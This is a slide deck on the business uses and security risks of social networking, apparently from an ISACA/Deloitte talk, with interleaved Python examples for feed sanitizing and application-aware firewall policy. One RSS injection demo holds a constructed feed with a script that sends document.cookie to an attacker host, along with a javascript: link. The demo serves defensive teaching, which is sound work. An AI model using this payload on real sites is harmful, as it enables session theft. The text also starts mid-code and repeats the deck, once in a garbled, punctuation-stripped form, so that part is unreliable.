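    for node in root.iter():
        if _local(node.tag) not in ("item", "entry"):
            continue
        entries.append({
            "title": sanitize_html(_child_text(node, "title")),
            "link": safe_link(_child_link(node)),
            "summary": sanitize_html(
                _child_text(node, "description", "summary", "content")),
        })
    return entries


# Constructed sample feed: the second item carries injected markup and
# a non-http link of the kind the RSS/Atom injection vector relies on.
SAMPLE_FEED = b"""<?xml version="1.0"?>
<rss version="2.0"><channel><title>Partner news (constructed)</title>
<item><title>Quarterly results</title>
<link>https://partner.example/q1</link>
<description>Revenue grew &lt;b&gt;12%&lt;/b&gt; this quarter.</description>
</item>
<item><title>Breaking</title>
<link>javascript:void(0)</link>
<description>&lt;script src="https://cdn.example/x.js"&gt;&lt;/script&gt;Click here</description>
</item></channel></rss>"""

# Constructed sample that must be refused before parsing.
POISONED_FEED = b'<?xml version="1.0"?><!DOCTYPE rss [<!ENTITY a "x">]><rss/>'

if __name__ == "__main__":
    for entry in sanitize_feed(SAMPLE_FEED):
        print(entry)
    print("poisoned feed refused:", feed_is_poisoned(POISONED_FEED))
```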
Slide 37: Risks and challenges (cont)

• Example worms/phishing attacks affecting social networking sites
  – Koobface – targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data.
  – Fbaction – Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account.
Slide 38: Risks and challenges (cont)

  – Boface – convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete, the user's Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends.
• Common element – they all take advantage of the implied trust that social networking users have with each other.
Slide 39: Risks and challenges (cont)

"Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening." – Marcus Ranum in InfoSec Magazine, May 2008

• Trust — Data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are starting to appear, often as plug-ins for social media tools.
• May also take advantage of URL shortening – bit.ly, tr.im, tinyurl.com, etc.
Slide 40: Risks and challenges (cont)

• More on phishing — social networks are a target-rich environment
Slide 41: Risks and challenges (cont)

• More on phishing — social networks are a target-rich environment (cont)

"Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady now. I was born on the 1st of January 1986 to the family of Kone. My father's name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School; my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it, my father died last year…" – See http://www.419legal.org for more details

• The 419 scams have evolved with the technology – now using LinkedIn to target specific individuals.
Slide 42: Risks and challenges (cont)

• Reputation — Damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of a response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account.
  – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized.
• Copyright violation — Third-party material such as essays, articles and photographs is used without written consent from the proprietor.
• Intellectual Property theft — Harder to prevent inadvertent data leakage through the one-to-many nature of Web 2.0 as a medium.
Slide 43: Risks and challenges (cont)

• Failures in the use of Social Media — most companies that use Social Media don't approach it the way they would other mission-critical technology
  – At best it can be said that most companies today are merely dabbling with Social Media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail

"Fully half of all Social Media investments will fail" — Gartner
Slide 44: Risks and challenges (cont)

"When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'cookie monster sings chocolate rain' about 1000 times." – Michael Scott from The Office

• Productivity — Users employ social media tools for nonproductive purposes such as socializing ("Social Notworking")
http://news.bbc.co.uk/2/hi/business/8325865.stm
Slide 45: Risks and challenges (cont)

• Technical Integration — Most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – Sign in using your account with: Facebook, Twitter, Myspace, Yahoo, Google, Windows Live ID, AOL, Blogger, WordPress, Netlog, OpenID, flickr
Slide 46: Risks and challenges (cont)

• Information hoarding — In many industries value is placed on what an employee knows that others do not know. This belief prevents data sharing.
• Quantification — Researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom's law, which states that — "The value of a network equals the net value of each user's transactions conducted through that network, valued from the perspective of each user, and summed for all."
Or alternatively:
  – http://en.wikipedia.org/wiki/Beckstrom's_law
Slide 47: Risks and challenges (cont)

• Litigation issues — Discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation issues.
Slide 48: A quick word on privacy

"People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time."
— Mark Zuckerberg, Facebook founder

"If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place."
— Eric Schmidt, CEO, Google Inc.
Slide 49: A quick word on privacy (cont)

• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data in use
• Data remanence – limited attempt to address
Slide 50: Responding to the risks and challenges

• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Define consequences for failure to comply, e.g. "termination of employment and legal action"
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)
Slide 51: Responding to the risks and challenges

• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
Slide 52: Responding to the risks and challenges (cont)

• Vulnerability Assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that Social Networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 & 443
  – Next-generation firewall technology offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real time
    • Visibility and policy control over application access
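To make "identify applications regardless of port" concrete for an auditor reviewing a control, here is an added Python example (not from the slides or any firewall vendor) that classifies proxy log lines by destination hostname rather than by port and applies a per-group read/post policy, with a port-only rule alongside for contrast. The log format, hostnames, groups and policy table are constructed assumptions.

```python
"""Added example (not from the slides or any firewall product): an
application-aware policy check over proxy/firewall log lines. The
application is identified from the destination hostname, never from
the port, and a per-group read/post policy is applied to it."""
import re
from collections import Counter
from typing import List, Optional, Tuple

# Assumed application signatures keyed by registered-domain suffix.
APP_SIGNATURES = {
    "facebook.com": "facebook", "fbcdn.net": "facebook",
    "twitter.com": "twitter",
    "linkedin.com": "linkedin",
    "youtube.com": "youtube",
}
# Assumed per-group policy: the apps a group may reach and whether it may
# post (write) to them; apps not listed for a group are blocked outright.
GROUP_POLICY = {
    "marketing": {"facebook": "post", "twitter": "post",
                  "linkedin": "post", "youtube": "read"},
    "staff": {"linkedin": "read", "youtube": "read"},
}
WRITE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}
# Assumed (constructed) log format: key=value fields on one line.
LOG_RE = re.compile(
    r"user=(?P<user>\S+) group=(?P<group>\S+) dst=(?P<dst>\S+) "
    r"dport=(?P<dport>\d+) method=(?P<method>\S+) path=(?P<path>\S+)")

Decision = Tuple[str, str, int, str, str]  # user, app, dport, method, verdict


def identify_app(hostname: str) -> Optional[str]:
    """Match the registered domain or any subdomain of it; port is ignored."""
    host = hostname.lower().rstrip(".")
    for suffix, app in APP_SIGNATURES.items():
        if host == suffix or host.endswith("." + suffix):
            return app
    return None


def legacy_port_rule(dport: int) -> str:
    """What a port-based firewall sees: 80 and 443 are 'web', so allowed."""
    return "allow" if dport in (80, 443) else "block"


def decide(group: str, app: Optional[str], method: str) -> str:
    """Apply the group policy to an identified application."""
    if app is None:
        return "allow"  # not a social-networking destination; out of scope
    permission = GROUP_POLICY.get(group, {}).get(app)
    if permission is None:
        return "block"
    if method.upper() in WRITE_METHODS and permission != "post":
        return "block"  # read-only groups may browse but not post/upload
    return "allow"


def evaluate(log_lines: List[str]) -> List[Decision]:
    """Classify each parseable log line; malformed lines are skipped."""
    decisions = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if m is None:
            continue
        app = identify_app(m["dst"])
        verdict = decide(m["group"], app, m["method"])
        decisions.append((m["user"], app or "other", int(m["dport"]),
                          m["method"], verdict))
    return decisions


def summary(decisions: List[Decision]) -> Counter:
    """Count verdicts per application for the audit report."""
    return Counter((app, verdict) for _, app, _, _, verdict in decisions)


# Constructed sample log lines; note the Twitter request on port 8080 and
# the LinkedIn request on port 80, both identified by hostname alone.
SAMPLE_LOG = [
    "2010-03-15T10:02:11 user=amy group=marketing dst=www.facebook.com dport=443 method=POST path=/ajax/updatestatus.php",
    "2010-03-15T10:03:40 user=bob group=staff dst=www.facebook.com dport=443 method=GET path=/home.php",
    "2010-03-15T10:05:02 user=bob group=staff dst=www.linkedin.com dport=80 method=GET path=/in/bob",
    "2010-03-15T10:06:19 user=bob group=staff dst=www.linkedin.com dport=443 method=POST path=/profile/edit",
    "2010-03-15T10:07:55 user=cat group=staff dst=api.twitter.com dport=8080 method=GET path=/1/statuses",
    "2010-03-15T10:09:30 user=cat group=staff dst=intranet.corp.example dport=443 method=POST path=/wiki/edit",
    "2010-03-15T10:10:00 malformed line without fields",
]

if __name__ == "__main__":
    for user, app, dport, method, verdict in evaluate(SAMPLE_LOG):
        print(f"{user:4} {app:9} port {dport:<5} {method:5} "
              f"port-rule={legacy_port_rule(dport):5} app-rule={verdict}")
    print(summary(evaluate(SAMPLE_LOG)))
```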
Slide 53: What is next in the world of social networking
Slide 54: Where we are at today

• Enterprise Social Media has crossed the tipping point and is no longer considered an "emerging" technology
"The Hype Cycle": http://en.wikipedia.org/wiki/Hype_cycle
Slide 55: What's next in the world of social networking

• Increase in the use of mobile devices to access Social Networks
  – Over 600 million people will use their phone to access Social Networks by 2013, an increase of more than 400% over the 2009 figure of 140 million. Source — eMarketer
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example — Facebook Connect
• Social Networks will become more pervasive — broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car's navigation system will be able to learn your friend's location and provide directions to them.
Slide 56: Some further predictions

• Some quotes on social networks
  – "Probably the greatest transformative force in our generation, absent a major war" — Mark Zuckerberg, Facebook founder
  – "(Twitter is)… Something important that has the potential to change the world, though we have a long way to go" — Biz Stone, Co-founder of Twitter
Slide 57: Q&A
Slide 58: Today's Presenters

Nelson Gibbs
Senior Manager
AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
Slide 59: Appendix

• Additional resources
  – Gopal, Raj et al., "Web 2.0 reinvents corporate networking", Deloitte Consulting LLP (2008)
  – The Economist — A special report on social networking, January 30, 2010
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – "Wall of Facebook: The Social Network's Plan to Dominate the Internet — and Keep Google Out" by Fred Vogelstein, Wired Magazine (June 2009), http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – "The Future is Social, Not Search, Facebook COO Says" by Ryan Singel, Wired Magazine (October 2009), http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site — http://www.bcs.org/socialmedia
Slide 60

This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.

Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
wwwisacaorg4
Social network Social network mdashmdash Some definitionsSome definitions
bull As defined in Wikipediandash A social network is a social structure made
of nodes (which are generally individuals or organizations) that are tied by one or more specific types of interdependency such as values visions ideas financial exchange friendship kinship dislike conflict or trade The resulting structures are often very complex
bull As defined in Webmasterndash Social networking is a phenomena defined by linking people to each
other in some way Digg is a popular example of a social network (using social bookmarking) Users work together to rate news and are linked by rating choices or explicit identification of other members Generally social networks are used to allow or encourage various types of activity whether commercial social or some combination of the two
wwwisacaorg5
What makes a Social Network so powerfulWhat makes a Social Network so powerful
bull Metcalfersquos lawndash The value of a telecommunications network is proportional to
the square of the number of connected users of the system (n2)
bull Related to the fact that the number of unique connections in a network of a number of nodes (n) can be expressed mathematically as the triangular number n(nndash1)2 which is proportional to n2 asymptoticallyhttpenwikipediaorgwikiMetcalfersquos_Law
bull Applying this to Social Networking mdash Consider LinkedIn mdashit took 16 months to reach the first one million users The latest million users were added in just 11 days
wwwisacaorg6
What makes a Social Network so powerful What makes a Social Network so powerful (cont)(cont)
bull Web 20ndash ldquoWeb 20rdquo was first coined in 1999 and by 2004 had become used to describe the
next evolution of the Web ndash Itrsquos based on the notion that people who consume media access the Internet and use
the Web shouldnrsquot passively absorb the flow of content from provider to viewer rather they should be active contributors helping customize media and technology for their own purposes
ndash Social network sites blogs wikis and other collaborative technologies are the result
Web 10 (Yesterday)
Power lies with institutionsplatforms and technologybull Structuredbull Siloedbull One size fits allbull Passive audiencebull Unilateral
Web 20 (Today)
Power lies with userscommunities and experiencesbull Flexiblebull Collaborativebull Communitiesbull Engaged usersbull Multilateral
wwwisacaorg7
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Mapping and measuring of relationships and flows among people groups organizations computers or other information knowledge processing entities
bull The nodes in the network are the people and groups while the links show relationships or flows between the nodes
bull Provides both a visual and a mathematical analysis of human relationships
Social network analysis
wwwisacaorg8
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites where entries are made (such as in a journal or diary) displayed in a reverse chronological order often provide commentary or news on a particular subject
bull Some function as personal online diaries or logbooksbull Combine text images and links to other blogs and Web
sitesbull Typically provide archives in calendar form local search
syndication feeds reader comment posting trackback links from other blogs blogroll links to other recommended blogs and categories of entries tagged for retrieval by topic
Blogs
wwwisacaorg9
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Short frequent posts with questions information or current status
bull Twitter (public) and Yammer (private) are two examplesbull Social software (including Facebook LinkedIn and
MySpace) now prompts for ldquowhatrsquos on your mindrdquo or similar status or mood lines
Microblogging
wwwisacaorg10
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites which allow users to easily add remove edit and change most available content
bull Effective for collaborative writing and self-service Web site creation and maintenance
Wikis
wwwisacaorg11
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Wikipedia ndash perhaps the best known Wikindash Launched on 15 January 2000ndash First edit on 16 January followed by 1000 articles in the first
month ndash Now has 17 million articles in 270 languages all written by
volunteers ndash Billionth edit took place on 16 April 2010 ndash Used by 400 million people every month ndash Claims to have 80000 editors although reports suggest that it
has recently lost thousands something Wikipedia disputes ndash Aims to grow to one billion users by 2015 with a focus on
women and people in the developing world ndash Critics maintain that many entries are untrustworthyndash But a disputed study has shown that for subjects such as
science it comes as close as traditional encyclopedias
Statistics taken from httpwwwbbccouknewstechnology-12171977
Wikis (cont)
wwwisacaorg12
Social network — More terminology (cont.)
Social networking software
• A range of tools which facilitate social networking
• Personal Web pages including bios, photos, interests, audio and video, links to friends, messages from friends, and personal networks
Social network — More terminology (cont.)
Social networking software (cont.)
• Facebook – the biggest of them all
  – Over 500 million registered users
  – 50% of active users log on to Facebook in any given day
  – About 70% of Facebook users are outside the US
  – More than 30 billion pieces of content (web links, news stories, blog posts, notes, photo albums, etc.) shared each month
  – People spend over 700 billion minutes per month on Facebook
  Statistics taken from http://www.facebook.com/press/info.php?statistics (Sept. 2010)
• As of March 13, 2010, Facebook was America's most popular site according to Experian Hitwise, with 7.1% of traffic compared to Google's 7.0%
Social network — More terminology (cont.)
Social bookmarking and tagging
• Sites which allow users to share links to sites with others
• Tags are metadata which classify content into categories
• Can be used to aid searches, create tag clouds and link disparate sources
Social network — More terminology (cont.)
Syndication and mashups
• Using feeds available from a Web site to provide an updated list of its content, in the form of a subscription, an embedded portion of a Web site, or a collection of disparate content on a particular topic
• RSS (Really Simple Syndication) or Atom syndication, with .rss, .xml or .rdf files used for the feeds
• Mashups combine data and feeds from multiple sources to provide a single integrated set of information, e.g. data plotted on a map
Social network — More terminology (cont.)
Videos and photos
• Online collections of videos and photos from users
• Users can upload, tag and rate content
Social Networking Companies

Social Media                      Popular Examples
Wikis                             Wikitravel, Wikipedia, wikiHow, WikiBooks, The TV IV
Blogs                             livejournal, WordPress, Blogger, Technorati, xanga
Social Networking                 myspace.com, LinkedIn, facebook, friendster, plaxo
RSS (Really Simple Syndication)   newsgator, Bloglines, iGoogle, FeedBurner
Presence and Microblogging        twitter, Pownce, jaiku, Hictu, tumblr
Social Bookmarking and Tagging    delicious, digg, reddit, newsvine, StumbleUpon
Online Photo and Video Sharing    YouTube, flickr, shutterfly, last.fm, slideshare
Why and how companies are using social networking
Statistics on companies using Social Networking
(Charts, two slides.) Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies.
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf
Companies typically adopt Social Media for three major benefits
1. Increase employee productivity and operational efficiencies
2. Foster creativity, innovation and collaboration
3. Enhance customer and partner relationships
Increase employee productivity and operational efficiencies
• Creates a lightweight institutional memory system in which a company's intellectual assets can be easily captured, stored and accessed
• Reduces the net volume of e-mail and allows users to "pull" information at their convenience, as opposed to spending time reading through mass e-mail chains
• Creates better-quality deliverables faster by drawing on the collective talents, knowledge and experiences of other employees around the world
Operational efficiencies
• A leading energy company realized approximately $250K in annual cost savings by conducting its employee conference virtually using Social Media
Improved reporting
• A global investment bank tightened reporting cycle times from several weeks to "about 30 seconds" per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
Increase employee productivity and operational efficiencies (cont.)
• American Red Cross
  – Designed to incite discussion around issues the American Red Cross cares about, to describe actions individuals can take (online or offline) to help people prevent, prepare for and respond to emergencies, and to give valuable information on those topics
  http://redcrosschat.org
Increase employee productivity and operational efficiencies (cont.)
• Deloitte's DWiki
  – Provides a safe, flexible knowledge-creation and information-sharing environment for all Deloitte practitioners, across country, practice and Deloitte organizational borders
  – Enhances the client service delivery capabilities of Deloitte practitioners
  – Serves as a test environment for innovative concepts and solutions which expand the business interests of Deloitte
As used in this document, "Deloitte" means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
Foster creativity, innovation and collaboration
• Harness product, process and service innovations by unlocking creativity and ideas from any area of the company
• The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
• Employees create unexpected connections with one another and expand their base of knowledge and experience and their circle of trusted colleagues
Product innovation
• A leading high-tech manufacturer instituted a "submit-and-vote-for-your-favorite-idea" social community with its consumers, generating over 5,000 ideas and over 300,000 votes in its first three months and subsequently identifying new product offerings
Information capture
• A federal agency created an internal wiki to bolster the capture and dissemination of mission-critical information between field agents
Foster creativity, innovation and collaboration (cont.)
• Best Buy
  – A community of Best Buy employees who convene regularly to share knowledge, best practices, frustrations, aspirations and a few jokes. Community members include everyone from recent high school graduates to semi-retirees.
  https://mix.blueshirtnation.com
Foster creativity, innovation and collaboration (cont.)
• Deloitte's DStreet
  – Enterprise talent networking site, changing the way we connect with each other
  – Enables another way of collaboration and community building
  – Network, build new relationships and forge successful careers
  – Learn about colleagues and interesting ways to introduce yourself
  – Identify new connection points to create a basis for meaningful conversation
  – A new way of assembling the right team
As used in this document, "Deloitte" means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
Enhance customer and partner relationships
• Opens the lines of communication beyond typical spokespeople such as marketing, sales and PR, and provides an avenue for other important stakeholders (e.g. engineers, scientists, product managers) to gather first-hand feedback from customers
• Allows customers to access help beyond traditional means, with networks that provide peer support and a user-generated knowledge base, while the company monitors customer perception
• Provides a forum for collaborative business development, education and communications with vendors, OEMs and other partners
• Allows consumers who know your products and services best to become a part of the new-offering development process
Revenue growth
• A major consumer goods company improved sales by 31.5% by including customer ratings, user-generated product reviews and other social features on its online storefront, also resulting in a 40% uptick in average order value
Enhance customer and partner relationships (cont.)
• Procter & Gamble
  – Capessa launched in the "Yahoo! Health" section of Yahoo.com, one of the world's leading Internet destinations. Women who register with capessa.yahoo.com have access to several topic areas, including parenting, pregnancy, weight loss, relationships, career, healthy living and caregiving.
  http://realwomenrealadvice.com
Enhance customer and partner relationships (cont.)
• American Express
  – OPEN Forum, an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs.
  http://www.openforum.com
Enhance customer and partner relationships (cont.)
• Louisville, Kentucky (city government)
  – Interactive audit findings on its Web site, which allow users to discuss previous audit findings
  http://www.louisvilleky.gov/InternalAudit
Enhance customer and partner relationships (cont.)
• Amazon (Shelfari)
  – A social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books.
  http://www.shelfari.com
Enhance customer and partner relationships (cont.)
• Bank of America (BofA)
  – On January 29, 2010, the Bank of America Web site was down. BofA used Twitter to keep in touch with its customers and let them know the latest update.
Risks and challenges
Risks and challenges
• Farmers and Mobsters
  – Top Facebook applications (source: http://statistics.allfacebook.com/applications/leaderboard, March 2010)
• There are now more than 500,000 active applications on the Facebook Platform

Rank  Name                     Monthly Active Users
1     FarmVille                82,580,911
2     Static FBML              46,827,021
3     Birthday Cards           41,904,049
4     Café World               30,032,716
5     Facebook for iPhone      29,438,848
6     Texas HoldEm Poker       28,332,917
7     Slide FunSpace           25,630,033
8     Happy Aquarium (BETA)    24,915,971
9     Mafia Wars               24,704,179
10    Causes                   24,317,292
Risks and challenges (cont.)
• New security concerns and attack vectors: a result of the shift in technology toward Web services that power server-side core components, and Asynchronous JavaScript and XML ("AJAX") and Rich Internet Application ("RIA") clients that enhance the client-side interface in the browser itself
• Top 10 Web 2.0 attack vectors (http://net-square.com/whitepapers/Top10_Web20_AV.pdf)
  – Cross-site scripting ("XSS") in AJAX, e.g. the Samy worm that exploited an XSS flaw in MySpace.com
  – XML poisoning: poisoned XML blocks coming from the AJAX client
  – Malicious AJAX code execution: replay of cookies with each request
  – RSS/Atom injection: JavaScript injected into RSS feeds to attack the client browser
  – Web Services Definition Language ("WSDL") scanning and enumeration
  – Client-side validation in AJAX routines: failure to perform server-side checks
  – Web services routing issues: compromise of intermediate nodes
  – Parameter manipulation with SOAP: web services consume information and variables from SOAP
  – XPath injection in SOAP messages: bypass of authentication mechanisms
  – RIA thick-client binary manipulation: issues with session management
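The RSS/Atom injection and XSS-in-AJAX items above are the same defect seen from two sides: feed text that a mashup or aggregator drops into the page without escaping. The Python below is an added example written for this page, not code from the presentation or from the Net-Square paper; the feed, the attacker host and the function names are all constructed for the demo. It parses a feed whose second item carries a script in its description and a javascript: link, renders it the naive way, then the escaped way, and checks whether active content reached the output.

```python
"""RSS/Atom injection: an aggregator that trusts feed text is an XSS sink.

Added example for the attack-vector list above; not code from the presentation
or from the Net-Square paper. The feed below is constructed for the demo.
"""
import html
import re
import xml.etree.ElementTree as ET

# Constructed feed: item 2 carries a script in its description and a
# javascript: URL in its link, the "inject JavaScript into the RSS feed" vector.
# The &lt;/&gt; entities are how the script survives XML parsing; the parser
# hands the aggregator the literal "<script>" text.
SAMPLE_RSS = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>Status feed</title>
<item><title>Quarterly results</title><link>http://example.com/results</link>
<description>Results are in.</description></item>
<item><title>Free gift</title><link>javascript:alert(document.cookie)</link>
<description>Claim it &lt;script&gt;new Image().src='http://attacker.example/?c='+document.cookie&lt;/script&gt; now</description></item>
</channel></rss>"""

SAFE_SCHEMES = ("http://", "https://")


def parse_items(feed_xml):
    """Pull title/link/description out of each <item>; text comes back unescaped."""
    root = ET.fromstring(feed_xml)
    return [{"title": item.findtext("title", ""),
             "link": item.findtext("link", ""),
             "description": item.findtext("description", "")}
            for item in root.iter("item")]


def render_unsafe(items):
    """The typical mashup widget: feed strings concatenated straight into HTML."""
    return "".join(
        f'<li><a href="{i["link"]}">{i["title"]}</a>: {i["description"]}</li>'
        for i in items)


def safe_link(url):
    """Allow only http(s) links; javascript:/data:/vbscript: URLs become '#'."""
    return url if url.strip().lower().startswith(SAFE_SCHEMES) else "#"


def render_safe(items):
    """Escape every feed-supplied string for its HTML context and whitelist link schemes."""
    return "".join(
        f'<li><a href="{html.escape(safe_link(i["link"]))}">'
        f'{html.escape(i["title"])}</a>: {html.escape(i["description"])}</li>'
        for i in items)


def contains_active_content(rendered):
    """Crude sink check: a raw <script> tag or a javascript: href in the output."""
    return re.search(r'<script|href="javascript:', rendered, re.I) is not None


if __name__ == "__main__":
    items = parse_items(SAMPLE_RSS)
    print("unsafe render carries script:", contains_active_content(render_unsafe(items)))
    print("safe render carries script:  ", contains_active_content(render_safe(items)))
```

`render_safe` escapes the whole description, which also strips any legitimate HTML formatting a feed may carry; an aggregator that needs to keep bold text or links should run an allow-list HTML sanitizer on the description instead of plain escaping, but the link-scheme check stays the same either way.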
Risks and challenges (cont.)
• Example worms and phishing attacks affecting social networking sites
  – Koobface: targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm that looks for personal data is downloaded to the PC
  – Fbaction: a Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account
Risks and challenges (cont.)
  – Boface: convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download completes, the user's Facebook account is hijacked and used to spam (and propagate the worm to) all their friends
• Common element: they all take advantage of the implied trust that social networking users have in each other
Risks and challenges (cont.)
"Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening." – Marcus Ranum in InfoSec Magazine, May 2008
• Trust: data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are starting to appear, often as plug-ins for social media tools
• Attacks may also take advantage of URL shortening (bit.ly, tr.im, tinyurl.com, etc.), which hides the real destination of a link until it is clicked
Risks and challenges (cont.)
• More on phishing: social networks are a target-rich environment
Risks and challenges (cont.)
• More on phishing: social networks are a target-rich environment (cont.)
"Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady now. I was born on the 1st of January 1986 to the family of Kone. My father's name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School; my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it, my father died last year……"
See http://www.419legal.org for more details
• The 419 scams have evolved with the technology, now using LinkedIn to target specific individuals
Risks and challenges (cont.)
• Reputation: damage to company brand or reputation through inappropriate comments or remarks from employees
  – Even a lack of response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account
  – Other examples include creating a social media program but not telling the rest of the company about it, so that staff are unaware of promotions or offers being publicized
• Copyright violation: third-party material such as essays, articles and photographs is used without written consent from the proprietor
• Intellectual property theft: inadvertent data leakage is harder to prevent because of the one-to-many nature of Web 2.0 as a medium
Risks and challenges (cont.)
• Failures in the use of Social Media: most companies that use Social Media don't approach it the way they would other mission-critical technology
  – At best, it can be said that most companies today are merely dabbling with Social Media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail
"Fully half of all Social Media investments will fail." – Gartner
Risks and challenges (cont.)
"When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'Cookie Monster Sings Chocolate Rain' about 1,000 times." – Michael Scott, The Office
• Productivity: users employ social media tools for nonproductive purposes such as socializing ("Social Notworking")
http://news.bbc.co.uk/2/hi/business/8325865.stm
Risks and challenges (cont.)
• Technical integration: most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – "Sign in using your account with…": Facebook, Twitter, Myspace, Yahoo, Google, Windows Live ID, AOL, Blogger, WordPress, Netlog, OpenID, flickr
Risks and challenges (cont.)
• Information hoarding: in many industries, value is placed on what an employee knows that others do not. This belief prevents data sharing
• Quantification: researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom's law, which states that "the value of a network equals the net value of each user's transactions conducted through that network, valued from the perspective of each user and summed for all"
  – Or, alternatively, the formulation at http://en.wikipedia.org/wiki/Beckstrom's_law
Risks and challenges (cont.)
• Litigation issues: discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation
A quick word on privacy
"People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time."
– Mark Zuckerberg, Facebook founder
"If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place."
– Eric Schmidt, CEO, Google Inc.
A quick word on privacy (cont.)
• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data is in use
• Data remanence: limited attempts to address it
Responding to the risks and challenges
• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Defines consequences for failure to comply, e.g. "termination of employment and legal action"
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)
Responding to the risks and challenges (cont.)
